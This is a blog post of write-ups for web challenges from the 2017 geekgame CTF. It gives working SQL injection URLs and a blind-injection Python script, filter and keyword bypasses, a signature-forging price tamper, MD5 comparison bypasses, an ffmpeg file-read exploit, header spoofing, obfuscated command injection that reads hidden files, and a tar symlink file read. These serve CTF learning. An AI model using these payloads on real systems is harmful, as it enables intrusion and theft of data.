sky's blog

2017 geekgame部分web题解

web writeup
字数统计: 1,667阅读时长: 9 min
2017/10/28 Share

故道白云

简单的注入,还要跨库是最坑的。。。。。。。

1
http://game.sycsec.com:2006/?submit=submit&id=-1' union select 1,(select f4ag from f1ag.flag) -- 1

得到flag:SYC{HACKEr_By-cL0und}

粗心的李超

存在index.php.bak泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include "flag.php";
if(isset($_POST['user'])&&isset($_POST['pass'])){
    if($_POST['user']=='admin'&&$_POST['pass']=='lc19971117'){
	setcookie("user","admin");
    }
}
if(isset($_COOKIE['user'])){
    if($_COOKIE['user']=="admin"){
	echo $flag;
    }else{
	echo "who are u ?";
    }
}else{
    setcookie("user","guest");
}
?>

登录即可获得flag:SYC{just_brute_is_ok!}

Buy me a Tesla

点击购买,然后抓包

1
submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=10&sign=WkVkV2VtSkhSazVpTWxKc1lrWm9OMlJ0Um5Oa1YxVTJUVlJaZDAxcVZYZE5RM2czWkZoT2JHTnVUVzVqZVVJMVpGZFZOazFVUWprPQ%3D%3D

对sign进行base64解密多次,得到:
teslaModelX{value:1602500,{users's yue:10}
修改后得到payload:

1
submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=100000000000&sign=%57%6b%56%6b%56%32%56%74%53%6b%68%53%61%7a%56%70%54%57%78%4b%63%31%6c%72%57%6d%39%4f%4d%6c%4a%30%55%6d%35%4f%61%31%59%78%56%54%4a%55%56%6c%4a%61%5a%44%41%78%63%56%5a%59%5a%45%35%52%4d%32%63%7a%57%6b%5a%6f%54%32%4a%48%54%6e%56%55%56%7a%56%71%5a%56%56%4a%4d%56%70%47%5a%46%5a%4f%61%7a%46%56%55%56%68%6b%54%6c%4a%46%52%6a%4e%55%56%56%4a%43%5a%44%41%78%52%56%46%59%5a%47%31%56%56%44%41%35

即可得到flag:<script>alert("购买成功!您的订单SYC{KeYiGeiWoMaiYiGeZhenDeTeslaMa?}")</script>

PHP的悖论1

题目描述

1
if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) === md5($_POST['s2'])) { echo $flag; }

简单的md5的漏洞绕过
post:s1[]=1&&s2[]=2即可
flag:SYC{Th3_b33t_l4n_1nth3w0rld!!!}

PHP的悖论2

题目描述

1
if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) == md5($_POST['s2'])) { echo $flag; }

简单的php弱等于,找俩0e开头的md5即可
post:s1=QNKCDZO&&s2=s878926199a
flag:SYC{Y0u_g0th3w4y_to_k111==}

视频播放器

看代码提示:

1
<!-- Powered by ffmpeg. ffmpeg shi sha?? baidu yi xia, ni jiu zhi dao.-->

百度ffmpeg
下载脚本 https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
运行脚本:python3 gen_xbin_avi.py file:///var/www/html/index.php sky.avi
上传sky.avi,即可看见flag:SYC{WhatIsExpFuckNoLiaoDe???}

iPhone X

改UA头即可,后来还提示需要加一个XFF

1
2
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS X_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25 Chrome/59.0.3071.86 Safari/537.36

然后可以得到flag:

1
2
3
4
<h1>Only iPhone X could access this website.</h1>
<hr>
<br>
OK, you have buy the iphone X using the time machine<br>SYC{UA_AND_IP_COULD_BE_FORGED_!!!}

Clound的错误

先看源码,发现问题

1
2
3
4
5
6
7
其实我是一个内向的人 我把我想说的话都隐藏起来 但是今天我要 大胆的说出来
	其实...其实...
	其实我是个SQL注入
	我要把我的"错误"全部表现出来
	-->
	<!--  sycid=1  -->
	<!-- hacked by cLound -->

还是简单的注入,要跨库

1
http://game.sycsec.com:2007/?sycid=1' and 1=updatexml(1,concat(0x7e,(select f4ag from f1ag.flag),0x7e),1) -- 1

得到flag:SYC{Err0r_sql_inj}

G胖万岁

http://game.sycsec.com:2008/Steam/1.php?type=DESC
分析url,应该是类似于下的sql语句:
select * from 表 order by 字段 $type;
所以我们需要影响排序的顺序:
本地测试了一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
select * from users order by id DESC;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  4 | zjgcjy   | 777       |
|  3 | jarbeen  | 666       |
|  2 | sky      | skyiscool |
|  1 | admin    | skyiscool |
+----+----------+-----------+

mysql> select * from users order by id;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  1 | admin    | skyiscool |
|  2 | sky      | skyiscool |
|  3 | jarbeen  | 666       |
|  4 | zjgcjy   | 777       |
+----+----------+-----------+

mysql> select * from users order by id ^1;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  1 | admin    | skyiscool |
|  3 | jarbeen  | 666       |
|  2 | sky      | skyiscool |
|  4 | zjgcjy   | 777       |
+----+----------+-----------+

mysql> select * from users order by id ^0;
+----+----------+-----------+
| id | username | password  |
+----+----------+-----------+
|  1 | admin    | skyiscool |
|  2 | sky      | skyiscool |
|  3 | jarbeen  | 666       |
|  4 | zjgcjy   | 777       |
+----+----------+-----------+

可以看到用^可以改变排序情况
那么我们在题目中试一下:

1
2
3
4
5
6
7
http://game.sycsec.com:2008/Steam/1.php?type=^1 limit 1
只出现了游戏
Witcher III

http://game.sycsec.com:2008/Steam/1.php?type=^0 limit 1
只出现了游戏
Portal2

然后可以利用这一点构造注入
注入脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/env python
# Author:Sublime
# coding:utf-8
import requests
res = ''
for x in range(1, 30):
    for y in range(33, 127):
        url = """http://game.sycsec.com:2008/Steam/1.php?type=^((ascii(substr((select f14g_is from g4m3e1.F1ag_1s_h3re limit 0,1),"""+str(x)+""",1)))="""+str(y)+""") limit 1"""
        f = requests.get(url=url)
        if 'Witcher' in f.content:
            res += chr(y)
            print res
            break

运行后即可得到flag:SYC{ShutupandBuy1t}
注意跨库……这比赛的所有注入貌似都跨库啊= =

Clound的错误2

这题就是加了过滤
空格用%0a绕过
or,and,select,from等双写绕过即可
容易得到payload:

1
http://game.sycsec.com:2010/?sycid=1'%0aaandnd%0a1=updatexml(1,concat(0x7e,(selselectect%0af4ag%0afrfromom%0af1ag.flag),0x7e),1)%0aaandnd%0a'a'='a

即可得到flag:SYC{Err0R_sQl_inj2}

大大的标题

发现1.zip源码泄露,审计一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php 
if( isset( $_POST[ 'submit' ] ) ) {
	$target_path  = "./upload/";
	$target_path .= basename( $_FILES[ 'file' ][ 'name' ] );
	$file_name = $_FILES[ 'file' ][ 'name' ];
	$file_ext  = substr( $file_name, strrpos( $file_name, '.' ) + 1);
	$file_type = $_FILES[ 'file' ][ 'type' ];
	$file_size = $_FILES[ 'file' ][ 'size' ];
	$allow_ext=array("jpg","jpeg","png");
	$succe_ext=array("php","php3","php4","php5","phtml","pht");
	$flag="flag";


	if( ( $file_type == "image/jpeg" || $file_type == "image/png" ) &&
		( $file_size < 100000 ) ) {

		if(in_array($file_ext, $allow_ext)){
			if( !move_uploaded_file( $_FILES[ 'file']['tmp_name' ], $target_path ) ) {
				echo "<center><h2>upload file error!!</h2></center>";
			}
			else {
			
				echo "<center><h2>{$target_path} succesfully uploaded!</h2></center>";
			}

		}
		if(in_array($file_ext,$succe_ext)){
			echo "<center><h3>".$flag."</h3></center>";
			system("rm -f ".$_FILES['file']['tmp_name']);
		}

	}
	else {

		echo "only accept JPG JPEG or PNG images and size < 100000";
	}
}

?>

发现修改Content-Type: image/jpeg即可,然后上传"php","php3","php4","php5","phtml","pht"任意一种后缀都可以拿到flag
flag:SYC{CLound-upL0ad}

你的名字

题目比较坑,一开始以为是注入,后来发现是命令注入:

1
2
3
http://game.sycsec.com:2012/?name=%0apwd
回显
你的名字是: /var/www/html

然后发现大量指令都被过滤了,学习了一波bash小特性的绕过
发现\可以绕过关键词

1
2
3
http://game.sycsec.com:2012/?name=%0al\s
回显
你的名字是: index.php

然后就很痛苦,找了很久没找到flag,后来猜想是不是用了隐藏文件

1
2
3
http://game.sycsec.com:2012/?name=%0afin\d%09
回显
你的名字是: . ./.YoufindMeButYouCanN0tReadMe.swp ./index.php

然后cat获取flag

1
2
3
4
http://game.sycsec.com:2012/?name=%0aca\t%09.Youfin\dMeButYouCanN0tReadMe.swp
回显
你的名字是: 
b0VIM 7.4�jrootiZwz9aqtiwio4jjeu737peZ/var/www/html/YoufindMeButYouCanN0tReadMe U3210#"! Utpad���SYC{Wo_ai_he_kou_jue_jiu}

快捷方式的妙用

题目title很明显告诉你了是tar
所以应该是上传tar包,他会解压你的tar,然后cat你的解压文件
所以思路很清晰了

1
2
ln -s /var/www/html/upload.php sky.txt
tar -cf sky.tar sky.txt

可以映射他的upload.php到sky.txt然后压缩成tar,再上传,即可获取源码
然后获得flag路径

1
2
ln -s /home/flag_is_here_hahaha sky.txt
tar -cf sky.tar sky.txt

然后再次上传后获取flag:SYC{Bust_1inK!!!}

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. 故道白云
  2. 2. 粗心的李超
  3. 3. Buy me a Tesla
  4. 4. PHP的悖论1
  5. 5. PHP的悖论2
  6. 6. 视频播放器
  7. 7. iPhone X
  8. 8. Clound的错误
  9. 9. G胖万岁
  10. 10. Clound的错误2
  11. 11. 大大的标题
  12. 12. 你的名字
  13. 13. 快捷方式的妙用
Total : 225
2020
2019
2018
2017
web writeup crypto misc others cve paper ml IOT
web writeup crypto misc others paper